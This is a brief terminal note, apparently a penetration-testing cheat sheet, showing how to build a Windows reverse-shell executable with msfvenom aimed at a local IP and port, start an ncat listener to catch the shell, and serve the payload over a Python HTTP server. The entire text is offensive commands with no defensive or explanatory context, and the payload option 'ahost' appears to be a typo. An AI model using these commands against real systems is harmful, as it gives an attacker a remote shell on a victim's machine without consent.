MSVenom


┌──(tbr㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp ahost=192.168.0.111 lport=1234 -f exe > ncshell.exe 
                                                                                                                                   
ncat -nvlp 1234
ip a; python3  -m http.server 80